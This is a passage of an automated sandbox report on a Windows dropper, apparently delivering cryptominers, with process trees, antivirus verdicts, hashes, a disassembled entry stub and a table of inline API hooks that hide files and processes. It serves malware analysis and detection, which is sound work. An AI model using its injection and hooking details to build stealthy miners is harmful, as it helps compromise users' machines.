        Signatures: Injects code into the Windows Explorer (explorer.exe); Contains functionality to inject code into remote processes; Writes to foreign memory regions; 4 other signatures
        lsass.exe, injected
          Signatures: Installs new ROOT certificates; Writes to foreign memory regions
        3 other processes
      powershell.exe (23), started
        conhost.exe, started
      cmd.exe (1), started
        2 other processes
      13 other processes
        13 other processes
    xmr new.exe (2), started
      Dropped: C:\ProgramData\...\eejhedztifcv.exe, PE32+
      powershell.exe (23), started
        Signatures: Loading BitLocker PowerShell Module
        2 other processes
      cmd.exe, started
        2 other processes
      sc.exe (1), started
        conhost.exe, started
      13 other processes
        12 other processes
    powershell.exe (23), started
      Signatures: Loading BitLocker PowerShell Module
      conhost.exe, started
  eejhedztifcv.exe, started
    Signatures: Multi AV Scanner detection for dropped file

Antivirus detection, submitted sample:
Source | Detection | Scanner | Label
kx new.exe | 71% | ReversingLabs | Win32.Dropper.Dapato
kx new.exe | 100% | Avira | TR/Dropper.Gen
kx new.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files:
Source | Detection | Scanner | Label
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | 74% | ReversingLabs | Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\Kawpow new.exe | 74% | ReversingLabs | Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\xmr new.exe | 74% | ReversingLabs | Win64.Infostealer.Tinba
No Antivirus matches
No Antivirus matches

Antivirus detection, URLs:
Source | Detection | Scanner | Label
http://crl.microsoftT | 0% | Avira URL Cloud | safe
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.microsoftT | powershell.exe, 00000002.00000002.1493135333.000000000870A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.1469378099.0000000005031000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1469378099.0000000005031000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | false | | high
No contacted IP infos
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1585415
                Start date and time:2025-01-07 16:08:11 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 11s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:72
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:4
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:kx new.exe
                Detection:MAL
                Classification:mal100.spyw.evad.winEXE@108/17@0/0
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 123
                • Number of non-executed functions: 263
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Excluded IPs from analysis (whitelisted): 20.190.159.2, 20.190.159.73, 20.190.159.64, 20.190.159.0, 20.190.159.4, 20.190.159.68, 40.126.31.71, 20.190.159.71, 172.202.163.200
                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                • Execution Graph export aborted for target Kawpow new.exe, PID 7556 because it is empty
                • Execution Graph export aborted for target eejhedztifcv.exe, PID 7604 because it is empty
                • Execution Graph export aborted for target xmr new.exe, PID 7672 because it is empty
• Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • VT rate limit hit for: kx new.exe
Time | Type | Description
10:09:11 | API Interceptor | 1x Sleep call for process: Kawpow new.exe modified
10:09:11 | API Interceptor | 60x Sleep call for process: powershell.exe modified
10:09:12 | API Interceptor | 1x Sleep call for process: xmr new.exe modified
10:09:53 | API Interceptor | 282394x Sleep call for process: lsass.exe modified
10:09:53 | API Interceptor | 351001x Sleep call for process: winlogon.exe modified
10:09:53 | API Interceptor | 1945x Sleep call for process: dialer.exe modified
10:09:54 | API Interceptor | 3251x Sleep call for process: svchost.exe modified
10:09:56 | API Interceptor | 334719x Sleep call for process: dwm.exe modified
10:09:56 | API Interceptor | 228x Sleep call for process: WmiPrvSE.exe modified
                No context
                No context
                No context
                No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Solara.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Solara.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\xmr new.exe | Solara.exe | malicious | Unknown
                      Process:C:\Users\user\AppData\Local\Temp\xmr new.exe
                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):5471744
                      Entropy (8bit):6.508687886623363
                      Encrypted:false
                      SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                      MD5:7D6398EBFB82A24748617189BF4AD691
                      SHA1:6C96D0E343E1E84BF58670F1249C1694A2012F04
                      SHA-256:D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
                      SHA-512:9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 74%
                      Joe Sandbox View:
                      • Filename: Solara.exe, Detection: malicious, Browse
                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\lsass.exe
                      File Type:very short file (no magic)
                      Category:modified
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:93B885ADFE0DA089CDF634904FD59F71
                      SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                      SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                      SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                      Malicious:false
                      Preview:.
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:NlllulFlz:NllUf
                      MD5:16D8A7BE440D46BEDCC37C8F9D4E4593
                      SHA1:B8DA9BE23D28A0B37302011579353193FD3BA566
                      SHA-256:761C903C5866AB1A9D3B2FDB6A42BD52B825277CB44E6703C634449AFFDF6460
                      SHA-512:02F634ECD03EDA05E73C5B412F7FB9F919F9C6343141E56DE38628FAF1475FE3048D21D7764C012A9A1BACFDA69C533DC7FB86ECCF63588239C90607546FFFE3
                      Malicious:false
                      Preview:@...e................................................@..........
                      Process:C:\Users\user\Desktop\kx new.exe
                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):5471744
                      Entropy (8bit):6.525931537093555
                      Encrypted:false
                      SSDEEP:98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
                      MD5:FB6A3B436E9F9402937D95F755B62F91
                      SHA1:AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
                      SHA-256:4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
                      SHA-512:7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 74%
                      Joe Sandbox View:
                      • Filename: Solara.exe, Detection: malicious, Browse
                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text.............................. ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\Desktop\kx new.exe
                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):5471744
                      Entropy (8bit):6.508687886623363
                      Encrypted:false
                      SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                      MD5:7D6398EBFB82A24748617189BF4AD691
                      SHA1:6C96D0E343E1E84BF58670F1249C1694A2012F04
                      SHA-256:D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
                      SHA-512:9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 74%
                      Joe Sandbox View:
                      • Filename: Solara.exe, Detection: malicious
                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................
                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Entropy (8bit):6.9823288417626
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.94%
                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • VXD Driver (31/22) 0.00%
                      File name:kx new.exe
                      File size:10'948'608 bytes
                      MD5:d9d13fa25e880665fb471a4be57c494c
                      SHA1:7a4c1b09a9d37ff55872544a39a2cc5f0eec9523
                      SHA256:632e973ab369d51e21b499e440bdd9c4b2ffaac9e435485a648de8724e1b19f7
                      SHA512:cf20f3c108865614a27d498ee74198ee151027423b518024155b1dff553b33877aed81e7d5394094625d1ee7da5de82fa4ed119420009a3f3fc51019add3522e
                      SSDEEP:196608:p+lBkH0sN5KVaq4Jsbwd+mftM8y+uevftTJp3q73uGiCHz/u/dLTu:l0saVF4Js8d+F+53Ra3Tj41u
                      TLSH:B1B6239C9526FF238E8E5DEDB1C92F5A7A04035B56C23329A224773A50B2356FF34E50
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@..........................@.......o.....................................
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0x4014d1
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                      DLL Characteristics:
                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:a9c887a4f18a3fede2cc29ceea138ed3
                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 00000008h
                      nop
                      mov eax, 00000004h
                      push eax
                      mov eax, 00000000h
                      push eax
                      lea eax, dword ptr [ebp-04h]
                      push eax
                      call 00007F9C20E3745Dh
                      add esp, 0Ch
                      mov eax, 004014AFh
                      push eax
                      call 00007F9C20E37497h
                      mov eax, 00000001h
                      push eax
                      call 00007F9C20E37494h
                      add esp, 04h
                      mov eax, 00030000h
                      push eax
                      mov eax, 00010000h
                      push eax
                      call 00007F9C20E37488h
                      add esp, 08h
                      mov eax, dword ptr [00E71E24h]
                      mov ecx, dword ptr [00E71E28h]
                      mov edx, dword ptr [00E71E2Ch]
                      mov dword ptr [ebp-08h], eax
                      lea eax, dword ptr [ebp-04h]
                      push eax
                      mov eax, dword ptr [00E72000h]
                      push eax
                      push edx
                      push ecx
                      mov eax, dword ptr [ebp-08h]
                      push eax
                      call 00007F9C20E37462h
                      add esp, 14h
                      mov eax, dword ptr [00E71E24h]
                      mov ecx, dword ptr [00E71E28h]
                      mov edx, dword ptr [00E71E2Ch]
                      mov dword ptr [ebp-08h], eax
                      mov eax, dword ptr [edx]
                      push eax
                      mov eax, dword ptr [ecx]
                      push eax
                      mov eax, dword ptr [ebp-08h]
                      mov eax, dword ptr [eax]
                      push eax
                      call 00007F9C20E3723Ch
                      add esp, 0Ch
                      push eax
                      call 00007F9C20E37438h
                      add esp, 04h
                      leave
                      ret
                      push ebp
                      mov ebp, esp
                      sub esp, 00000004h
                      nop
                      mov eax, dword ptr [00E71E24h]
                      mov ecx, dword ptr [ebp+08h]
                      mov dword ptr [eax], ecx
                      mov eax, dword ptr [00000000h]
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa71db0 | 0x50 | .rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa73000 | 0x300 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0xa71e00 | 0x58 | .rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0x668 | 0x800 | fe360b88a7d70310ec7735c08c77eb2f | False | 0.4072265625 | data | 4.606556744591122 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata | 0x2000 | 0xa6ffb3 | 0xa70000 | 90615ee92adc6f3e61c0447244393bb3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .bss | 0xa72000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0xa73000 | 0x300 | 0x400 | 0d1dee6fc25344777b8613290c733e97 | False | 0.357421875 | data | 4.312685380006898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_MANIFEST | 0xa73058 | 0x2a5 | XML 1.0 document, ASCII text | English | United States | 0.4756277695716396
                      DLL | Import
                      msvcrt.dll | malloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                      shell32.dll | ShellExecuteA
                      kernel32.dll | SetUnhandledExceptionFilter
                      Language of compilation system | Country where language is spoken | Map
                      English | United States
                      No network behavior found

                      Code Manipulations

                      Function Name | Hook Type | Active in Processes
                      ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
                      NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                      ZwResumeThread | INLINE | explorer.exe, winlogon.exe
                      NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                      ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                      NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
                      NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                      ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                      ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                      NtResumeThread | INLINE | explorer.exe, winlogon.exe
                      RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
                      NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                      NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                      ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                      ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                      Function Name | Hook Type | New Data
                      ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                      NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                      ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                      NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                      ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                      ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                      RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
